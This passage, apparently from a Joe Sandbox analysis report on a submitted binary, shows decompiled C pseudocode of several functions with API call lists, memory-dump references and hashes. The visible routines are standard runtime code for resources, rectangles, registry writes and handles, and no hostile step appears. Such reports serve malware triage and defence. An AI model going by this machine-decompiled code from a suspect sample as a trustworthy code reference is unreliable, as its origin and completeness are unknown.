                                                      						 *((intOrPtr*)(_t64 - 0x1c)) = 0x4361d8;
                                                      						E0040E956(_t64 - 0x1c);
                                                      						return E0041F7C2(_t55);
                                                      					}
                                                      					_push(_t60);
                                                      					E00413FBC( *((intOrPtr*)( *((intOrPtr*)(_t62 - 0xac)) + 0x20)));
                                                      					__eflags =  *(_t64 - 0x10);
                                                      					 *(_t64 - 4) = 0;
                                                      					if( *(_t64 - 0x10) != 0) {
                                                      						_push( *((intOrPtr*)(_t64 - 0x14)));
                                                      						_push(0);
                                                      						E0040D3B7();
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				_push( *((intOrPtr*)(_t64 + 0x10)));
                                                      				goto L2;
                                                      			}












                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Rect$EqualH_prolog3Intersect
                                                      • String ID:
                                                      • API String ID: 2161412305-0
                                                      • Opcode ID: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
                                                      • Instruction ID: 673062383659f9e1f0083c5338fa9c7e27454a49a707c8e2040369ae72bcd230
                                                      • Opcode Fuzzy Hash: 0b57ece63e3ceba4902fc7c2f66c781dd9ec10f0bed8fd36c999eebc1094b62d
                                                      • Instruction Fuzzy Hash: 42212772D00209EBCF11EFA5C9809EEBB78BF48314F00856AE515A3251D7789A45DB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E00403115(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
                                                      				intOrPtr* _v0;
                                                      				void* _v4;
                                                      				signed int _v8;
                                                      				intOrPtr _v16;
                                                      				void* _t20;
                                                      				intOrPtr* _t23;
                                                      				void* _t29;
                                                      				void* _t31;
                                                      				intOrPtr _t35;
                                                      				char _t36;
                                                      				void* _t40;
                                                      				void* _t42;
                                                      				void* _t44;
                                                      
                                                      				_t44 = __eflags;
                                                      				_t38 = __esi;
                                                      				_t37 = __edi;
                                                      				_t31 = __ebx;
                                                      				_push(4);
                                                      				E0041F6EA(E00431B6F, __ebx, __edi, __esi);
                                                      				_t35 = E00402EE1(_t44, 0xc);
                                                      				_v16 = _t35;
                                                      				_t20 = 0;
                                                      				_v4 = 0;
                                                      				if(_t35 != 0) {
                                                      					_t20 = E004030C0(_t35);
                                                      				}
                                                      				_t36 = _a4;
                                                      				_v8 = _v8 | 0xffffffff;
                                                      				 *((intOrPtr*)(_t20 + 8)) = _t36;
                                                      				_a4 = _t20;
                                                      				E0041F7F4( &_a4, 0x43c3a8);
                                                      				asm("int3");
                                                      				_t40 = _t42;
                                                      				_t23 = _v0;
                                                      				_push(_t31);
                                                      				if(_t23 != 0) {
                                                      					 *_t23 = 0;
                                                      				}
                                                      				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
                                                      					E00402FE8(0, _t36, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
                                                      					LocalFree(_a12);
                                                      					_t29 = 1;
                                                      					__eflags = 1;
                                                      				} else {
                                                      					 *_a4 = 0;
                                                      					_t29 = 0;
                                                      				}
                                                      				return _t29;
                                                      			}

















                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 0040311C
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      • __CxxThrowException@8.LIBCMT ref: 00403152
                                                      • FormatMessageA.KERNEL32(00001100,00000000,8007000E,00000800,?,00000000,00000000,?,?,8007000E,0043C3A8,00000004,0040105C,8007000E), ref: 0040317B
                                                        • Part of subcall function 00402FE8: _wctomb_s.LIBCMT ref: 00402FF8
                                                      • LocalFree.KERNEL32(?), ref: 004031A4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                      • String ID:
                                                      • API String ID: 1615547351-0
                                                      • Opcode ID: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
                                                      • Instruction ID: a0072123bbb8e88f97f6a2e598c50d444f9710c5a47a49e3e247eeb1caa48808
                                                      • Opcode Fuzzy Hash: bcf99224840559c6eef959b414b5f999186a6ce74dcae3b75fd50ea2255e4a84
                                                      • Instruction Fuzzy Hash: DE11C671604249AFDF00DFA4CC81DAE3BA9EB08354F10453AF925DA2E1D675DA51C758
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E004060A2(void* __ecx) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				signed int _t23;
                                                      				void* _t28;
                                                      				void* _t30;
                                                      				struct HINSTANCE__* _t32;
                                                      				signed int _t34;
                                                      				signed short _t35;
                                                      				void* _t37;
                                                      				signed short* _t40;
                                                      
                                                      				_push(__ecx);
                                                      				_push(_t28);
                                                      				_t37 = __ecx;
                                                      				_t42 =  *((intOrPtr*)(__ecx + 0x58));
                                                      				_t40 =  *(__ecx + 0x60);
                                                      				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
                                                      				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
                                                      					_t32 =  *(E0040DB94(_t28, __ecx, _t40, _t42) + 0xc);
                                                      					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					_t40 = LockResource(_v8);
                                                      				}
                                                      				_t30 = 1;
                                                      				if(_t40 != 0) {
                                                      					_t35 =  *_t40;
                                                      					if(_t40[1] != 0xffff) {
                                                      						_t23 = _t40[5] & 0x0000ffff;
                                                      						_t34 = _t40[6] & 0x0000ffff;
                                                      					} else {
                                                      						_t35 = _t40[6];
                                                      						_t23 = _t40[9] & 0x0000ffff;
                                                      						_t34 = _t40[0xa] & 0x0000ffff;
                                                      					}
                                                      					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
                                                      						_t30 = 0;
                                                      					}
                                                      				}
                                                      				if( *(_t37 + 0x58) != 0) {
                                                      					FreeResource(_v8);
                                                      				}
                                                      				return _t30;
                                                      			}

















                                                      APIs
                                                      • FindResourceA.KERNEL32(?,00000000,00000005), ref: 004060C8
                                                      • LoadResource.KERNEL32(?,00000000), ref: 004060D0
                                                      • LockResource.KERNEL32(00000000), ref: 004060E2
                                                      • FreeResource.KERNEL32(00000000), ref: 0040612C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindFreeLoadLock
                                                      • String ID:
                                                      • API String ID: 1078018258-0
                                                      • Opcode ID: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
                                                      • Instruction ID: 40659096538afe78b8a2922fa92c0b5113ad7cc5d91cea190e6c9c4304d24e44
                                                      • Opcode Fuzzy Hash: e99a868e6682d6fb6f2d9392ce75bffce52346b6c94286f6ba8a0afa17a2f0ef
                                                      • Instruction Fuzzy Hash: EE11BF30500712EBCB209FA5C848AABBBB4FF04355F11857AE84367691D378ED60D764
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E004044BD(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* _t37;
                                                      				intOrPtr _t43;
                                                      				void* _t45;
                                                      				intOrPtr* _t51;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      
                                                      				_t53 = __eflags;
                                                      				_t46 = __ecx;
                                                      				_t44 = __ebx;
                                                      				_push(4);
                                                      				E0041F6EA(E00431C96, __ebx, __edi, __esi);
                                                      				_t51 = __ecx;
                                                      				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                      				E00404F70(__ebx, __ecx, __edi, __ecx, _t53);
                                                      				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                      				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                      				 *_t51 = 0x435184;
                                                      				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                      					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                      				} else {
                                                      					_t43 = E0041FD45( *((intOrPtr*)(_t52 + 8)));
                                                      					_pop(_t46);
                                                      					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                      				}
                                                      				_t45 = E0040DB94(_t44, 0, _t51, _t54);
                                                      				_t55 = _t45;
                                                      				if(_t45 == 0) {
                                                      					L4:
                                                      					E004037E3(_t45, _t46, 0, _t51, _t55);
                                                      				}
                                                      				_t7 = _t45 + 0x74; // 0x74
                                                      				_t46 = _t7;
                                                      				_t37 = E00404129(_t45, _t7, 0, _t51, _t55);
                                                      				if(_t37 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                      				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                      				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                      				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                      				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                      				 *((short*)(_t51 + 0x92)) = 0;
                                                      				 *((short*)(_t51 + 0x90)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                      				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                      				return E0041F7C2(_t51);
                                                      			}










                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004044C4
                                                        • Part of subcall function 00404F70: __EH_prolog3.LIBCMT ref: 00404F77
                                                      • __strdup.LIBCMT ref: 004044E6
                                                      • GetCurrentThread.KERNEL32 ref: 00404513
                                                      • GetCurrentThreadId.KERNEL32 ref: 0040451C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CurrentH_prolog3Thread$__strdup
                                                      • String ID:
                                                      • API String ID: 4206445780-0
                                                      • Opcode ID: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
                                                      • Instruction ID: 20f32028a5bae838525036816734f9698e3db64a09468b62decb6aeab759841c
                                                      • Opcode Fuzzy Hash: f6c692d57fc520b1d6ef77885f23c6874392034aff60066bfb7f5f5535edbddf
                                                      • Instruction Fuzzy Hash: 4521A4B0800B50CFC7219F2A854565AFBF4BFA4704F10892FD19A97B61DBB4A445DF08
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 94%
                                                      			E0040672A(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                      				signed int _v8;
                                                      				char _v24;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t13;
                                                      				CHAR* _t21;
                                                      				char* _t24;
                                                      				intOrPtr _t28;
                                                      				void* _t30;
                                                      				signed int _t31;
                                                      
                                                      				_t28 = __edx;
                                                      				_t13 =  *0x443590; // 0xa920217c
                                                      				_v8 = _t13 ^ _t31;
                                                      				_t24 = _a8;
                                                      				_t30 = __ecx;
                                                      				_t29 = _a4;
                                                      				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                      					E0041FC83( &_v24, 0x10, "%d", _a12);
                                                      					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                      				} else {
                                                      					_t30 = E004066E4(__ecx, _t29);
                                                      					if(_t30 != 0) {
                                                      						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                      						_t29 = _t21;
                                                      						RegCloseKey(_t30);
                                                      						_t18 = 0 | _t21 == 0x00000000;
                                                      					}
                                                      				}
                                                      				return E0041E5DF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                      			}















                                                      APIs
                                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 00406763
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0040676C
                                                      • _swprintf.LIBCMT ref: 00406789
                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0040679A
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                      • String ID:
                                                      • API String ID: 4210924919-0
                                                      • Opcode ID: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
                                                      • Instruction ID: 21f77df2bb305b21e633773eb41cbea4057ecc6761c3a3b171915aab709e64d7
                                                      • Opcode Fuzzy Hash: e6f28c74d63e3e0f4c9bb6e8f8a4ffe9fc3b50b675efa29d1162e23e9e8736cd
                                                      • Instruction Fuzzy Hash: F001C476500209BBDB109F658C85FAF73BCAF48708F41083ABA01E7181DA78E91587A8
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 84%
                                                      			E0040B87A(intOrPtr* __ecx) {
                                                      				char _v20;
                                                      				intOrPtr _v32;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				intOrPtr* __esi;
                                                      				struct HWND__* _t18;
                                                      				void* _t24;
                                                      				intOrPtr _t29;
                                                      				intOrPtr* _t33;
                                                      
                                                      				_t28 = __ecx;
                                                      				_push(0);
                                                      				_t33 = __ecx;
                                                      				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                      					__eax =  *__esi;
                                                      					__ecx = __esi;
                                                      					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                      				}
                                                      				_t30 = SendMessageA;
                                                      				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                      				E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                      				_t28 = _t33;
                                                      				_t33 = E0040AF65(0, _t28, SendMessageA);
                                                      				if(_t33 != 0) {
                                                      					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                      					E0040A5C3(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                      					_t18 = GetCapture();
                                                      					if(_t18 != 0) {
                                                      						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                      					}
                                                      					return _t18;
                                                      				} else {
                                                      					_push(_t28);
                                                      					_t2 =  &_v20; // 0x4423e8
                                                      					_v20 = 0x442480;
                                                      					E0041F7F4(_t2, 0x43c590);
                                                      					asm("int3");
                                                      					_push(4);
                                                      					E0041F6EA(E00431BFC, 0, SendMessageA, _t33);
                                                      					_t29 = E0040F014(0x104);
                                                      					_v32 = _t29;
                                                      					_t24 = 0;
                                                      					_v20 = 0;
                                                      					if(_t29 != 0) {
                                                      						_t24 = E0040D519(_t29);
                                                      					}
                                                      					return E0041F7C2(_t24);
                                                      				}
                                                      			}













                                                      APIs
                                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8A4
                                                      • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0040B8CF
                                                        • Part of subcall function 0040A5C3: GetTopWindow.USER32(00000000), ref: 0040A5D1
                                                      • GetCapture.USER32 ref: 0040B8E1
                                                      • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 0040B8F0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CaptureWindow
                                                      • String ID:
                                                      • API String ID: 729421689-0
                                                      • Opcode ID: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
                                                      • Instruction ID: e49af4e3184ea6db717b127f1b3927963753d97c6b9026f51526ec4d1578ed3f
                                                      • Opcode Fuzzy Hash: 6beb2dde5ff0e5b61ad0c8a51189c6d7a99162051fb35d5cd912703861ab2b7c
                                                      • Instruction Fuzzy Hash: 360171B13503097FFA212B208CC9FBB76ADEB88748F010539F241BB1E2CAA55C005A69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00406C31(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t18;
                                                      				struct HRSRC__* _t25;
                                                      				void* _t28;
                                                      				intOrPtr* _t34;
                                                      				void* _t36;
                                                      				intOrPtr _t37;
                                                      				struct HINSTANCE__* _t39;
                                                      
                                                      				_push(__ecx);
                                                      				_t28 = 0;
                                                      				_t40 = _a8;
                                                      				_push(_t36);
                                                      				_t34 = __ecx;
                                                      				_v8 = 0;
                                                      				if(_a8 == 0) {
                                                      					L4:
                                                      					_t37 = _a4;
                                                      					_a8 = 1;
                                                      					if(_t28 != 0) {
                                                      						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
                                                      						if(_v8 != 0) {
                                                      							FreeResource(_v8);
                                                      						}
                                                      					}
                                                      					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
                                                      						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
                                                      					}
                                                      					_t18 = _a8;
                                                      					L10:
                                                      					return _t18;
                                                      				}
                                                      				_t39 =  *(E0040DB94(0, __ecx, _t36, _t40) + 0xc);
                                                      				_t25 = FindResourceA(_t39, _a8, 0xf0);
                                                      				if(_t25 == 0) {
                                                      					goto L4;
                                                      				}
                                                      				_t18 = LoadResource(_t39, _t25);
                                                      				_v8 = _t18;
                                                      				if(_t18 == 0) {
                                                      					goto L10;
                                                      				}
                                                      				_t28 = LockResource(_t18);
                                                      				goto L4;
                                                      			}
















                                                      APIs
                                                      • FindResourceA.KERNEL32(?,?,000000F0), ref: 00406C55
                                                      • LoadResource.KERNEL32(?,00000000), ref: 00406C61
                                                      • LockResource.KERNEL32(00000000), ref: 00406C6F
                                                      • FreeResource.KERNEL32(00000000), ref: 00406C9D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindFreeLoadLock
                                                      • String ID:
                                                      • API String ID: 1078018258-0
                                                      • Opcode ID: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
                                                      • Instruction ID: 11cc8024c2f07788693a5cf3b80dfacf3a4c7265796ede5ebdbe0383e22cf367
                                                      • Opcode Fuzzy Hash: 725bdaf51e1b943991e5373a74aa2e6cad060cb5622a81dcc914f303c66514db
                                                      • Instruction Fuzzy Hash: 2B112871600209EFDB108FA6D848A9B7BB9FF44355F05807AF946A7291CB78A910CB64
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E00415364(void* __edi, void* __esi, void* __eflags, intOrPtr _a4, RECT* _a8, int _a12) {
                                                      				intOrPtr _v8;
                                                      				char _v12;
                                                      				struct tagRECT _v28;
                                                      				intOrPtr _t35;
                                                      
                                                      				_t35 = _a4;
                                                      				E0040DBE0( &_v12, __eflags,  *((intOrPtr*)(_t35 - 0xb0)));
                                                      				if(_a8 != 0) {
                                                      					IntersectRect( &_v28, _a8, _t35 - 0x9c);
                                                      					EqualRect( &_v28, _a8);
                                                      				} else {
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      				}
                                                      				if(IsRectEmpty( &_v28) == 0) {
                                                      					InvalidateRect( *( *((intOrPtr*)( *((intOrPtr*)(_t35 - 0xac)) + 0x20)) + 0x20),  &_v28, _a12);
                                                      				}
                                                      				if(_v8 != 0) {
                                                      					_push(_v12);
                                                      					_push(0);
                                                      					E0040D3B7();
                                                      				}
                                                      				return 0;
                                                      			}








                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Rect$EmptyEqualIntersectInvalidate
                                                      • String ID:
                                                      • API String ID: 3354205298-0
                                                      • Opcode ID: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
                                                      • Instruction ID: 695aae43ea9637a98273fc7b87fa48ff0bcdc9407a5be2b6daed2edba48ecd02
                                                      • Opcode Fuzzy Hash: cd773583f8eec6913ba4177664b886877b1c38ce39c4077a6852081b8256b7b2
                                                      • Instruction Fuzzy Hash: 8711187690020EEBCF01DF94D889FDEBBB9FF44309F004062FA04AB111D375AA959BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E00410317(void* __ecx, void* __eflags) {
                                                      				void* _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t9;
                                                      				void* _t11;
                                                      				int _t13;
                                                      				void* _t23;
                                                      				intOrPtr* _t30;
                                                      				void* _t32;
                                                      				void* _t34;
                                                      				void* _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_t23 = __ecx;
                                                      				_t9 = E00402EE1(__eflags, 0x10);
                                                      				_t37 = _t9;
                                                      				if(_t9 == 0) {
                                                      					_t30 = 0;
                                                      					__eflags = 0;
                                                      				} else {
                                                      					_t30 = E004102FA(_t9, _t37);
                                                      				}
                                                      				_t11 = GetCurrentProcess();
                                                      				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                                                      				_t34 = _t32;
                                                      				if(_t13 == 0) {
                                                      					if(_t30 != 0) {
                                                      						 *((intOrPtr*)( *_t30 + 4))(1);
                                                      					}
                                                      					E0041B0C1(_t23, _t30, _t34, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                                                      				}
                                                      				 *((intOrPtr*)(_t30 + 4)) = _v8;
                                                      				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t23 + 8));
                                                      				return _t30;
                                                      			}

















                                                      APIs
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00410349
                                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 0041034F
                                                      • DuplicateHandle.KERNEL32(00000000), ref: 00410352
                                                      • GetLastError.KERNEL32(?), ref: 0041036D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                                                      • String ID:
                                                      • API String ID: 3704204646-0
                                                      • Opcode ID: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
                                                      • Instruction ID: 3b195a4d90feac135872a4ffd9d4d720c51410c6d11ff7f0ee39d7a6200223b5
                                                      • Opcode Fuzzy Hash: 127a2b6425212ae10ae3fc16ac81f62d75707bc7e267825681550bdd9f0b7852
                                                      • Instruction Fuzzy Hash: 7C018471700204AFDB109BA6CD89F9B7BA8DF84750F144466FD05CB281DBB5EC809BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00404952(void* __ecx, void* __edi, void* __ebp, signed int _a4) {
